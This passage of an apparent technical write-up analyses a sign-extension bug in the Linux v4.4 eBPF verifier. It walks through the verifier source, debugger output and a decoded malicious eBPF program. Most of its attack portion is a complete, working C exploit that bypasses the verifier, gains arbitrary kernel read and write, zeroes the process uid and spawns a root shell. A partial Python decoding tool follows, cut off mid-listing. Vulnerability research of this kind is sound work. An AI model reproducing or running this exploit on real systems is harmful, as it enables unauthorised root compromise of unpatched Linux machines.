[1] err = check_reg_arg(regs, insn->dst_reg, DST_OP_NO_MARK);
if (err)
return err;

src_reg_type = regs[insn->src_reg].type;

/* check that memory (src_reg + off) is readable,
* the state of dst_reg will be updated by this func
*/
[2] err = check_mem_access(env, insn->src_reg, insn->off,
BPF_SIZE(insn->code), BPF_READ,
insn->dst_reg);
if (err)
return err;

if (BPF_SIZE(insn->code) != BPF_W) {
insn_idx++;
continue;
}

if (insn->imm == 0) {
/* saw a valid insn
* dst_reg = *(u32 *)(src_reg + off)
* use reserved 'imm' field to mark this insn
*/
insn->imm = src_reg_type;

} else if (src_reg_type != insn->imm &&
(src_reg_type == PTR_TO_CTX ||
insn->imm == PTR_TO_CTX)) {
/* ABuser program is trying to use the same insn
* dst_reg = *(u32*) (src_reg + off)
* with different pointer types:
* src_reg == ctx in one branch and
* src_reg == stack|map in some other branch.
* Reject it.
*/
verbose("same insn cannot be used with different pointers\n");
return -EINVAL;
}

} else if (class == BPF_STX) {
enum bpf_reg_type dst_reg_type;

if (BPF_MODE(insn->code) == BPF_XADD) {
err = check_xadd(env, insn);
if (err)
return err;
insn_idx++;
continue;
}

/* check src1 operand */
[1] err = check_reg_arg(regs, insn->src_reg, SRC_OP);
if (err)
return err;
/* check src2 operand */
[1] err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
if (err)
return err;

dst_reg_type = regs[insn->dst_reg].type;

/* check that memory (dst_reg + off) is writeable */
[2] err = check_mem_access(env, insn->dst_reg, insn->off,
BPF_SIZE(insn->code), BPF_WRITE,
insn->src_reg);
if (err)
return err;

if (insn->imm == 0) {
insn->imm = dst_reg_type;
} else if (dst_reg_type != insn->imm &&
(dst_reg_type == PTR_TO_CTX ||
insn->imm == PTR_TO_CTX)) {
verbose("same insn cannot be used with different pointers\n");
return -EINVAL;
}

}

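These checks block both obvious approaches:
- Putting an address into a register with an assignment such as MOV marks the register CONST_IMM, so any access through it is rejected.
- Getting a map value back through a helper such as BPF_FUNC_map_lookup_elem, loading an address from it into a register, and dereferencing that register also fails. The loaded register is marked UNKNOWN_VALUE at assignment time, so the access is rejected.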
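The register checks from Q&A2 can be modelled in a few lines. This is a simplified sketch of check_reg_arg() and of the pointer types that check_mem_access() accepts in v4.4. Bounds, alignment and pointer-leak checks are left out, and the sk_-prefixed names are hypothetical:

```c
#include <errno.h>
#include <stdbool.h>

#define SK_MAX_BPF_REG 11   /* R0..R10 */
#define SK_REG_FP      10   /* R10, frame pointer */

enum sk_reg_type { NOT_INIT = 0, UNKNOWN_VALUE, PTR_TO_CTX, CONST_PTR_TO_MAP,
                   PTR_TO_MAP_VALUE, PTR_TO_MAP_VALUE_OR_NULL, FRAME_PTR,
                   PTR_TO_STACK, CONST_IMM };
enum sk_arg { SRC_OP, DST_OP, DST_OP_NO_MARK };

/* Simplified model of check_reg_arg(). */
static int sk_check_reg_arg(enum sk_reg_type *regs, unsigned regno, enum sk_arg t)
{
    if (regno >= SK_MAX_BPF_REG)
        return -EINVAL;                  /* "R%d is invalid"                */
    if (t == SRC_OP) {
        if (regs[regno] == NOT_INIT)
            return -EACCES;              /* reading an uninitialised reg    */
    } else {
        if (regno == SK_REG_FP)
            return -EACCES;              /* frame pointer is read only      */
        if (t == DST_OP)
            regs[regno] = UNKNOWN_VALUE; /* result of the op is not tracked */
    }
    return 0;
}

/* Base-register types a load/store may use (bounds checks omitted). */
static bool sk_mem_access_allowed(enum sk_reg_type t)
{
    return t == PTR_TO_MAP_VALUE || t == PTR_TO_CTX || t == FRAME_PTR;
}
```

CONST_IMM and UNKNOWN_VALUE both fall outside sk_mem_access_allowed, which is exactly why the two approaches described above are rejected.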

__bpf_prog_run

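That covers all the checks performed at load time; every memory read/write method we could think of gets caught. The code that actually runs lives in __bpf_prog_run, where the so-called registers and stack are just local variables of the function: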

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)
{
u64 stack[MAX_BPF_STACK / sizeof(u64)];
u64 regs[MAX_BPF_REG], tmp;
static const void *jumptable[256] = {
[0 ... 255] = &&default_label,
/* Now overwrite non-defaults ... */

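The interpreter keeps a jump table indexed by opcode and dispatches through it. The function performs no checks at all, and the implementation is simple, so I won't go through it.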

Note that the registers here differ from the verifier's. Here they are u64 (unsigned long long), whereas the verifier tracks constants in a 32-bit int.

Exploitation

Bypassing bpf_check through the integer-extension problem

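The bug comes from an inconsistency between how the verifier and the real interpreter execute a program; the core issue is that they store register values with different types. Consider the following EBPF instructions: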

[0]: ALU_MOV_K(0,9,0x0,0xffffffff)
[1]: JMP_JNE_K(0,9,0x2,0xffffffff)
[2]: ALU64_MOV_K(0,0,0x0,0x0)
[3]: JMP_EXIT(0,0,0x0,0x0)
[4]: ......
......

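Instruction [0] puts 0xffffffff into r9. In do_check, the branch marked [1] in check_alu_op below copies it into r9's state as the int -1 and sets the type to CONST_IMM. Instruction [1] compares r9 with 0xffffffff. If they are equal, [2] and [3] execute and the program returns 0; otherwise execution jumps to [4].

From the exit analysis above, do_check treats this comparison as always true. It never pushes the other path onto the stack and simply exits, so nothing from [4] onward is ever verified.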

		if (class == BPF_ALU || class == BPF_ALU64) {
err = check_alu_op(env, insn);
if (err)
return err;
}
static int check_alu_op(struct verifier_env *env, struct bpf_insn *insn)
{
struct reg_state *regs = env->cur_state.regs;
u8 opcode = BPF_OP(insn->code);
int err;

if (opcode == BPF_END || opcode == BPF_NEG) {
... ...
}

/* check src operand */
.......

/* check dest operand */
.......

} else if (opcode == BPF_MOV) {

if (BPF_SRC(insn->code) == BPF_X) {
if (insn->imm != 0 || insn->off != 0) {
verbose("BPF_MOV uses reserved fields\n");
return -EINVAL;
}

/* check src operand */
err = check_reg_arg(regs, insn->src_reg, SRC_OP);
if (err)
return err;
} else {
if (insn->src_reg != BPF_REG_0 || insn->off != 0) {
verbose("BPF_MOV uses reserved fields\n");
return -EINVAL;
}
}

/* check dest operand */
err = check_reg_arg(regs, insn->dst_reg, DST_OP);
if (err)
return err;

if (BPF_SRC(insn->code) == BPF_X) {
if (BPF_CLASS(insn->code) == BPF_ALU64) {
/* case: R1 = R2
* copy register state to dest reg
*/
regs[insn->dst_reg] = regs[insn->src_reg];
} else {
if (is_pointer_value(env, insn->src_reg)) {
verbose("R%d partial copy of pointer\n",
insn->src_reg);
return -EACCES;
}
regs[insn->dst_reg].type = UNKNOWN_VALUE;
regs[insn->dst_reg].map_ptr = NULL;
}
[1] } else {
/* case: R = imm
* remember the value we stored into this reg
*/
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = insn->imm;
}

} else if (opcode > BPF_END) {
verbose("invalid BPF_ALU opcode %x\n", opcode);
return -EINVAL;

} else { /* all other ALU ops: and, sub, xor, add, ... */
......
}

return 0;
}
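The verifier's side of the bug can be modelled in a few lines. Three facts drive it:
- The constant is kept in a 32-bit int.
- The same code path records the constant for 32-bit (BPF_ALU) and 64-bit (BPF_ALU64) MOVs alike.
- Branch [1] of check_cond_jmp_op then prunes the JNE target.

The names below are hypothetical:

```c
#include <stdbool.h>
#include <stdint.h>

/* The verifier's view of one register (cf. struct reg_state). */
struct sk_reg_state {
    bool const_imm;   /* type == CONST_IMM            */
    int  imm;         /* 32-bit signed, as in v4.4    */
};

/* MOV_K as check_alu_op() records it: regs[dst].imm = insn->imm.
 * Nothing distinguishes a 32-bit MOV from a 64-bit one here. */
static void verifier_mov_k(struct sk_reg_state *r, int32_t imm)
{
    r->const_imm = true;
    r->imm = imm;
}

/* Branch [1] of check_cond_jmp_op() for JNE with an immediate: if the
 * register is a known constant equal to imm, only the fall-through is
 * followed. Returns true if the jump target gets queued for checking. */
static bool verifier_explores_jne_target(const struct sk_reg_state *r, int32_t imm)
{
    if (r->const_imm && r->imm == imm)
        return false;   /* "if (imm != imm) goto pc+off": target never checked */
    return true;        /* otherwise push_stack(env, idx + off + 1, ...)       */
}
```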

During real execution, however, the register types differ, and the second instruction (the jump) misbehaves:

JMP_JNE_K:
    if (DST != IMM) {
        insn += insn->off;
        CONT_JMP;
    }
    CONT;

In the compiled assembly the problem becomes obvious:

   0xffffffff81173bad <__bpf_prog_run+1565>    mov    qword ptr [rbp + rax*8 - 0x278], rdi
0xffffffff81173bb5 <__bpf_prog_run+1573> movzx eax, byte ptr [rbx]
0xffffffff81173bb8 <__bpf_prog_run+1576> jmp qword ptr [r12 + rax*8]

0xffffffff81173e7b <__bpf_prog_run+2283> movzx eax, byte ptr [rbx + 1]
0xffffffff81173e7f <__bpf_prog_run+2287> movsxd rdx, dword ptr [rbx + 4]
► 0xffffffff81173e83 <__bpf_prog_run+2291> and eax, 0xf
0xffffffff81173e86 <__bpf_prog_run+2294> cmp qword ptr [rbp + rax*8 - 0x278], rdx
0xffffffff81173e8e <__bpf_prog_run+2302> je __bpf_prog_run+5036 <0xffffffff8117493c>

0xffffffff81173e94 <__bpf_prog_run+2308> movsx rax, word ptr [rbx + 2]
0xffffffff81173e99 <__bpf_prog_run+2313> lea rbx, [rbx + rax*8 + 8]
0xffffffff81173e9e <__bpf_prog_run+2318> movzx eax, byte ptr [rbx]
─────────────────────────────────────[ STACK ]──────────────────────────────────────
00:0000│ rsp 0xffff88000048fa30 ◂— 0xcc
01:0008│ 0xffff88000048fa38 ◂— 0x0
02:0010│ 0xffff88000048fa40 —▸ 0xffff88000fabb500 ◂— 0x0
03:0018│ 0xffff88000048fa48 —▸ 0xffffffff811afebc (zone_statistics+124) ◂— 0xbec35d5d415c415b
04:0020│ 0xffff88000048fa50 ◂— 0x1
05:0028│ 0xffff88000048fa58 —▸ 0xffff88000c46e780 ◂— 0x17c
06:0030│ 0xffff88000048fa60 —▸ 0xffff88000048fc18 —▸ 0xffff88000048fc70 —▸ 0xffff88000a550f00 ◂— 0x200000001
07:0038│ 0xffff88000048fa68 —▸ 0xffff88000048fb30 —▸ 0xffff88000048fc70 —▸ 0xffff88000a550f00 ◂— 0x200000001
───────────────────────────────────[ BACKTRACE ]────────────────────────────────────
► f 0 ffffffff81173e83 __bpf_prog_run+2291
f 1 ffffffff817272bc sk_filter_trim_cap+108
f 2 ffffffff817272bc sk_filter_trim_cap+108
f 3 ffffffff817b824a unix_dgram_sendmsg+586
f 4 ffffffff817b824a unix_dgram_sendmsg+586
f 5 ffffffff816f4728 sock_sendmsg+56
f 6 ffffffff816f4728 sock_sendmsg+56
f 7 ffffffff816f47c5 sock_write_iter+133
f 8 ffffffff8120cf59 __vfs_write+201
f 9 ffffffff8120cf59 __vfs_write+201
f 10 ffffffff8120d5d9 vfs_write+169
pwndbg> i r rdx
rdx 0xffffffffffffffff -1
pwndbg> x /gx $rbx+4
0xffffc90000099034: 0x000000b7ffffffff
pwndbg>

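The immediate is loaded with movsxd, which sign-extends it from 0xffffffff to 0xffffffffffffffff. r9, on the other hand, was written by a 32-bit MOV (ALU_MOV_K), which zero-extends, so it holds 0x00000000ffffffff. The 64-bit comparison therefore finds the two values different. Execution jumps to [4], and the EBPF program from [4] onward runs without ever having been verified.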
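The runtime side can be modelled the same way. The sketch assumes the interpreter semantics ALU_MOV_K: DST = (u32) IMM and JMP_JNE_K: if (DST != IMM), where DST is a u64 and IMM is the s32 insn->imm. The helper names are hypothetical:

```c
#include <stdbool.h>
#include <stdint.h>

/* ALU_MOV_K: a 32-bit op, so the upper half of DST is zeroed. */
static uint64_t interp_alu_mov_k(int32_t imm)
{
    return (uint32_t)imm;                    /* zero-extension */
}

/* JMP_JNE_K: IMM is converted to 64 bits by sign-extension (movsxd). */
static bool interp_jne_k_taken(uint64_t dst, int32_t imm)
{
    return dst != (uint64_t)(int64_t)imm;
}
```

With a 64-bit ALU64_MOV_K instead, r9 would also be sign-extended and the comparison would match. The discrepancy therefore hinges on combining a 32-bit MOV with a 64-bit compare.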

Building the exploit

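Because the instructions from [4] onward are never verified, we are free to craft them. At run time there are no types at all, so arbitrary kernel memory reads and writes become possible.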

Decoding an existing EBPF exploit program with my tool gives the following logic:

[0]: ALU_MOV_K(0,9,0x0,0xffffffff)
[1]: JMP_JNE_K(0,9,0x2,0xffffffff)
[2]: ALU64_MOV_K(0,0,0x0,0x0)
[3]: JMP_EXIT(0,0,0x0,0x0)
[4]: LD_IMM_DW(1,9,0x0,0x3)
[5]: maybe padding
[6]: ALU64_MOV_X(9,1,0x0,0x0)
[7]: ALU64_MOV_X(10,2,0x0,0x0)
[8]: ALU64_ADD_K(0,2,0x0,0xfffffffc)
[9]: ST_MEM_W(0,10,0xfffc,0x0)
[10]: JMP_CALL(0,0,0x0,0x1)
[11]: JMP_JNE_K(0,0,0x1,0x0)
[12]: JMP_EXIT(0,0,0x0,0x0)
[13]: LDX_MEM_DW(0,6,0x0,0x0)
[14]: ALU64_MOV_X(9,1,0x0,0x0)
[15]: ALU64_MOV_X(10,2,0x0,0x0)
[16]: ALU64_ADD_K(0,2,0x0,0xfffffffc)
[17]: ST_MEM_W(0,10,0xfffc,0x1)
[18]: JMP_CALL(0,0,0x0,0x1)
[19]: JMP_JNE_K(0,0,0x1,0x0)
[20]: JMP_EXIT(0,0,0x0,0x0)
[21]: LDX_MEM_DW(0,7,0x0,0x0)
[22]: ALU64_MOV_X(9,1,0x0,0x0)
[23]: ALU64_MOV_X(10,2,0x0,0x0)
[24]: ALU64_ADD_K(0,2,0x0,0xfffffffc)
[25]: ST_MEM_W(0,10,0xfffc,0x2)
[26]: JMP_CALL(0,0,0x0,0x1)
[27]: JMP_JNE_K(0,0,0x1,0x0)
[28]: JMP_EXIT(0,0,0x0,0x0)
[29]: LDX_MEM_DW(0,8,0x0,0x0)
[30]: ALU64_MOV_X(0,2,0x0,0x0)
[31]: ALU64_MOV_K(0,0,0x0,0x0)
[32]: JMP_JNE_K(0,6,0x3,0x0)
[33]: LDX_MEM_DW(7,3,0x0,0x0)
[34]: STX_MEM_DW(3,2,0x0,0x0)
[35]: JMP_EXIT(0,0,0x0,0x0)
[36]: JMP_JNE_K(0,6,0x2,0x1)
[37]: STX_MEM_DW(10,2,0x0,0x0)
[38]: JMP_EXIT(0,0,0x0,0x0)
[39]: STX_MEM_DW(8,7,0x0,0x0)
[40]: JMP_EXIT(0,0,0x0,0x0)

Let's analyze this program.

[0]~[3] were covered above, so we move on to the remaining instructions.

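Instructions [4]~[5] follow from the map discussion above. LD_IMM_DW has src_reg = 1 (BPF_PSEUDO_MAP_FD) and imm = 3, so it loads the map whose fd is 3. The exploit hardcodes this value, relying on the map being the first fd opened after stdin/stdout/stderr. [5] is the second half of the 64-bit load, which the kernel fills with the upper 32 bits of the map address. After these two instructions execute, r9 holds the map's address.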

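Instructions [6]~[13] correspond to the C-like code below. They call BPF_FUNC_map_lookup_elem(map_addr, &idx) and load the 8-byte value at the returned pointer into r6, i.e. r6 = map[0].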

[6]: r1=r9
[7]: r2=rbp
[8]: r2 = r2-4
[9]: [rbp+(-4)] = 0 (idx)
[10]: call BPF_FUNC_map_lookup_elem
[11]: if r0== 0:
[12]: exit(0)
[13]: r6=[r0]

[14]~[21] likewise set r7 = map[1], and [22]~[29] set r8 = map[2]. The map contents are supplied from user space.

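Finally, [30]~[40] form three parts, selected by map[0]. Note that [30] sets r2 to r0, the pointer returned by the last lookup, i.e. &map[2]. The map has only 3 entries, so there is no map[3].
- map[0] = 0: the value at the address stored in map[1] is read and written into map[2]. User space can then read map[2] to get the value, which gives an arbitrary read.
- map[0] = 1: r10 (rbp) is written into map[2], leaking a kernel stack address.
- Any other value (the exploit uses 2): the value of map[2] is written to the address stored in map[1], which gives an arbitrary write.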

[30]: ALU64_MOV_X(0,2,0x0,0x0) r2=r0
[31]: ALU64_MOV_K(0,0,0x0,0x0) r0=0
[32]: JMP_JNE_K(0,6,0x3,0x0) if r6!=0 jmpto 36
[33]: LDX_MEM_DW(7,3,0x0,0x0) r3 = [r7]
[34]: STX_MEM_DW(3,2,0x0,0x0) [r2]=r3
[35]: JMP_EXIT(0,0,0x0,0x0) exit(0)
[36]: JMP_JNE_K(0,6,0x2,0x1) if r6!=1 jmpto 39
[37]: STX_MEM_DW(10,2,0x0,0x0) [r2]=rbp
[38]: JMP_EXIT(0,0,0x0,0x0) exit(0)
[39]: STX_MEM_DW(8,7,0x0,0x0) [r7]=r8
[40]: JMP_EXIT(0,0,0x0,0x0) exit(0)
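The following user-space simulation of [30]~[40] makes the three operations concrete, with a tiny fake address space standing in for kernel memory. It assumes, as in the listing, that r6/r7/r8 were loaded from map[0..2] and that r0 (and therefore r2) points at map[2]. fake_mem, deref and run_gadget are hypothetical:

```c
#include <stdint.h>

#define FAKE_MEM_WORDS 16
static uint64_t fake_mem[FAKE_MEM_WORDS];   /* stands in for kernel memory */

/* "Addresses" in this sketch are just indexes into fake_mem. */
static uint64_t *deref(uint64_t addr)
{
    return &fake_mem[addr % FAKE_MEM_WORDS];
}

/* map[] is the 3-entry array map; frame_ptr plays the role of r10. */
static void run_gadget(uint64_t map[3], uint64_t frame_ptr)
{
    uint64_t r6 = map[0], r7 = map[1], r8 = map[2];
    uint64_t *r2 = &map[2];            /* r2 = r0 = &map[2]                 */

    if (r6 == 0)
        *r2 = *deref(r7);              /* op 0: read *map[1] into map[2]    */
    else if (r6 == 1)
        *r2 = frame_ptr;               /* op 1: leak r10 into map[2]        */
    else
        *deref(r7) = r8;               /* op 2: write map[2] to *map[1]     */
}
```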

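The exploit is then straightforward:
1. Use operation 1 to leak a kernel stack address.
2. Mask that address with & ~(0x4000 - 1). On this kernel the result is the base of the 16 KiB kernel stack, where struct thread_info lives.
3. Read the first field of thread_info with operation 0. That field points to the thread's task_struct.

task_struct contains a cred pointer to the thread's credentials, but the offset of that pointer changes with the kernel build. In gdb it can be found with: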

pwndbg> p &(*(struct task_struct *)0).cred
$2 = (const struct cred **) 0x9b8 <irq_stack_union+2488>

Operation 0 can therefore read out the cred address. Find the offset of uid within cred the same way:

pwndbg> p &(*(struct cred *)0).uid
$3 = (kuid_t *) 0x4 <irq_stack_union+4>

Finally, operation 2 writes 0 to that address, and privilege escalation succeeds:

/ $ id
uid=1000(chal) gid=1000(chal) groups=1000(chal)
/ $ ./upstream44
mapfd finished
bpf_prog_load finished
socketpair finished
setsockopt finished
task_struct = ffff880006d90000
uidptr = ffff8800004313c4
spawning root shell
uid=0(root) gid=0(root) euid=1000(chal) egid=1000(chal) groups=1000(chal)
/ $
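The pointer arithmetic of the final steps can be sketched as below. The sketch assumes 16 KiB kernel stacks with struct thread_info at the stack base, which holds for x86-64 v4.4 before thread_info moved into task_struct. It also assumes the offsets found with gdb above; CRED_OFFSET in particular is build-specific. The function names are hypothetical:

```c
#include <stdint.h>

#define SK_THREAD_SIZE 0x4000ULL  /* assumed 16 KiB kernel stacks (x86-64, v4.4)   */
#define SK_CRED_OFFSET 0x9b8ULL   /* offsetof(struct task_struct, cred), per build */
#define SK_UID_OFFSET  0x4ULL     /* offsetof(struct cred, uid)                    */

/* Step 1: leaked frame pointer -> stack base holding struct thread_info;
 * reading 8 bytes there (op 0) yields thread_info->task. */
static uint64_t thread_info_from_fp(uint64_t fp)
{
    return fp & ~(SK_THREAD_SIZE - 1);
}

/* Step 2: address of task->cred; reading it (op 0) yields the cred pointer. */
static uint64_t cred_slot(uint64_t task)
{
    return task + SK_CRED_OFFSET;
}

/* Step 3: address of cred->uid; writing 0 there (op 2) sets uid to root. */
static uint64_t uid_ptr(uint64_t cred)
{
    return cred + SK_UID_OFFSET;
}
```

For instance, the uidptr printed in the run above, ffff8800004313c4, corresponds to a cred structure at ffff8800004313c0.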

Related code

EXP


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>

#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x9b8 //0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328 //-32

int sockets[2];
int mapfd, progfd;

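/* eBPF program, 41 instructions. Register and offset notation follows ebpf_tool. */
char *__prog = "\xb4\x09\x00\x00\xff\xff\xff\xff" // w9 = 0xffffffff (32-bit mov, zero-extended at run time)
"\x55\x09\x02\x00\xff\xff\xff\xff" // if r9 != (s64)-1 goto +2: verifier assumes not taken, run time jumps
"\xb7\x00\x00\x00\x00\x00\x00\x00" // r0 = 0
"\x95\x00\x00\x00\x00\x00\x00\x00" // exit (the only path the verifier follows)
"\x18\x19\x00\x00\x03\x00\x00\x00" // r9 = map (LD_IMM_DW, src=BPF_PSEUDO_MAP_FD, fd 3)
"\x00\x00\x00\x00\x00\x00\x00\x00" // second half of LD_IMM_DW
"\xbf\x91\x00\x00\x00\x00\x00\x00" // r1 = r9 (map)
"\xbf\xa2\x00\x00\x00\x00\x00\x00" // r2 = r10 (fp)
"\x07\x02\x00\x00\xfc\xff\xff\xff" // r2 += -4
"\x62\x0a\xfc\xff\x00\x00\x00\x00" // *(u32 *)(fp - 4) = 0 (key 0)
"\x85\x00\x00\x00\x01\x00\x00\x00" // call map_lookup_elem
"\x55\x00\x01\x00\x00\x00\x00\x00" // if r0 != 0 goto +1
"\x95\x00\x00\x00\x00\x00\x00\x00" // exit
"\x79\x06\x00\x00\x00\x00\x00\x00" // r6 = map[0] (op)
"\xbf\x91\x00\x00\x00\x00\x00\x00" // r1 = r9 (map)
"\xbf\xa2\x00\x00\x00\x00\x00\x00" // r2 = r10 (fp)
"\x07\x02\x00\x00\xfc\xff\xff\xff" // r2 += -4
"\x62\x0a\xfc\xff\x01\x00\x00\x00" // *(u32 *)(fp - 4) = 1 (key 1)
"\x85\x00\x00\x00\x01\x00\x00\x00" // call map_lookup_elem
"\x55\x00\x01\x00\x00\x00\x00\x00" // if r0 != 0 goto +1
"\x95\x00\x00\x00\x00\x00\x00\x00" // exit
"\x79\x07\x00\x00\x00\x00\x00\x00" // r7 = map[1] (address)
"\xbf\x91\x00\x00\x00\x00\x00\x00" // r1 = r9 (map)
"\xbf\xa2\x00\x00\x00\x00\x00\x00" // r2 = r10 (fp)
"\x07\x02\x00\x00\xfc\xff\xff\xff" // r2 += -4
"\x62\x0a\xfc\xff\x02\x00\x00\x00" // *(u32 *)(fp - 4) = 2 (key 2)
"\x85\x00\x00\x00\x01\x00\x00\x00" // call map_lookup_elem
"\x55\x00\x01\x00\x00\x00\x00\x00" // if r0 != 0 goto +1
"\x95\x00\x00\x00\x00\x00\x00\x00" // exit
"\x79\x08\x00\x00\x00\x00\x00\x00" // r8 = map[2] (value)
"\xbf\x02\x00\x00\x00\x00\x00\x00" // r2 = r0 (&map[2])
"\xb7\x00\x00\x00\x00\x00\x00\x00" // r0 = 0
"\x55\x06\x03\x00\x00\x00\x00\x00" // if r6 != 0 goto +3
"\x79\x73\x00\x00\x00\x00\x00\x00" // op 0: r3 = *(u64 *)r7
"\x7b\x32\x00\x00\x00\x00\x00\x00" //       *(u64 *)r2 = r3 (map[2] = *addr)
"\x95\x00\x00\x00\x00\x00\x00\x00" // exit
"\x55\x06\x02\x00\x01\x00\x00\x00" // if r6 != 1 goto +2
"\x7b\xa2\x00\x00\x00\x00\x00\x00" // op 1: *(u64 *)r2 = r10 (map[2] = fp)
"\x95\x00\x00\x00\x00\x00\x00\x00" // exit
"\x7b\x87\x00\x00\x00\x00\x00\x00" // op 2: *(u64 *)r7 = r8 (*addr = value)
"\x95\x00\x00\x00\x00\x00\x00\x00"; // exit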

char bpf_log_buf[LOG_BUF_SIZE];

/* Wrapper around bpf(BPF_PROG_LOAD); the verifier log is written to bpf_log_buf. */
static int bpf_prog_load(enum bpf_prog_type prog_type,
                         const struct bpf_insn *insns, int prog_len,
                         const char *license, int kern_version) {
    union bpf_attr attr = {
        .prog_type = prog_type,
        .insns = (__u64)insns,
        .insn_cnt = prog_len / sizeof(struct bpf_insn),
        .license = (__u64)license,
        .log_buf = (__u64)bpf_log_buf,
        .log_size = LOG_BUF_SIZE,
        .log_level = 1,
    };

    attr.kern_version = kern_version;

    bpf_log_buf[0] = 0;

    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

/* Wrapper around bpf(BPF_MAP_CREATE). */
static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
                          int max_entries) {
    union bpf_attr attr = {
        .map_type = map_type,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries
    };

    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

/* map[key] = value. The map key is 4 bytes, so only the low 32 bits of key
 * are read (little-endian host). */
static int bpf_update_elem(uint64_t key, uint64_t value) {
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)&key,
        .value = (__u64)&value,
        .flags = 0,
    };

    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

static int bpf_lookup_elem(void *key, void *value) {
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)key,
        .value = (__u64)value,
    };

    return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

static void __exit(char *err) {
    fprintf(stderr, "error: %s\n", err);
    exit(-1);
}

/* Create the 3-slot array map, load the program, attach it to a socket. */
static void prep(void) {
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
    if (mapfd < 0)
        __exit(strerror(errno));
    puts("mapfd finished");
    progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
                           (struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

    if (progfd < 0)
        __exit(strerror(errno));
    puts("bpf_prog_load finished");
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
        __exit(strerror(errno));
    puts("socketpair finished");
    if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
        __exit(strerror(errno));
    puts("setsockopt finished");
}

/* Send one datagram; its delivery to sockets[1] runs the eBPF program once. */
static void writemsg(void) {
    char buffer[64];

    ssize_t n = write(sockets[0], buffer, sizeof(buffer));

    if (n < 0) {
        perror("write");
        return;
    }
    if (n != sizeof(buffer))
        fprintf(stderr, "short write: %zd\n", n);
}

/* map[0] = op, map[1] = address, map[2] = value, then trigger the program. */
#define __update_elem(a, b, c) do {  \
        bpf_update_elem(0, (a));     \
        bpf_update_elem(1, (b));     \
        bpf_update_elem(2, (c));     \
        writemsg();                  \
    } while (0)

static uint64_t get_value(int key) {
    uint64_t value;

    if (bpf_lookup_elem(&key, &value))
        __exit(strerror(errno));

    return value;
}

/* op 1: the program stores its frame pointer (r10) into map[2]. */
static uint64_t __get_fp(void) {
    __update_elem(1, 0, 0);

    return get_value(2);
}

/* op 0: map[2] = *(u64 *)addr */
static uint64_t __read(uint64_t addr) {
    __update_elem(0, addr, 0);

    return get_value(2);
}

/* op 2: *(u64 *)addr = val */
static void __write(uint64_t addr, uint64_t val) {
    __update_elem(2, addr, val);
}

/* Round down to the 16 KiB kernel stack base, where thread_info lives. */
static uint64_t get_sp(uint64_t addr) {
    return addr & ~(0x4000 - 1);
}

static void pwn(void) {
    uint64_t fp, sp, task_struct, credptr, uidptr;

    fp = __get_fp();
    if (fp < PHYS_OFFSET)
        __exit("bogus fp");

    sp = get_sp(fp);
    if (sp < PHYS_OFFSET)
        __exit("bogus sp");

    task_struct = __read(sp); // thread_info->task is the first member

    if (task_struct < PHYS_OFFSET)
        __exit("bogus task ptr");

    printf("task_struct = %lx\n", task_struct);

    credptr = __read(task_struct + CRED_OFFSET); // cred

    if (credptr < PHYS_OFFSET)
        __exit("bogus cred ptr");

    uidptr = credptr + UID_OFFSET; // uid
    if (uidptr < PHYS_OFFSET)
        __exit("bogus uid ptr");

    printf("uidptr = %lx\n", uidptr);
    __write(uidptr, 0); // 8-byte store: sets both uid and gid to 0

    if (getuid() == 0) {
        printf("spawning root shell\n");
        system("id");
        system("/bin/sh");
        exit(0);
    }

    __exit("not vulnerable?");
}

int main(int argc, char **argv) {
    prep();
    pwn();

    return 0;
}

ebpf_tool

import sys

opcode = []
for i in range(256):
    opcode.append('invalid opcode')

code = '''
"\xb4\x09\x00\x00\xff\xff\xff\xff"
"\x55\x09\x02\x00\xff\xff\xff\xff"
"\xb7\x00\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x18\x19\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x00\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x06\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x01\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x07\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x02\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
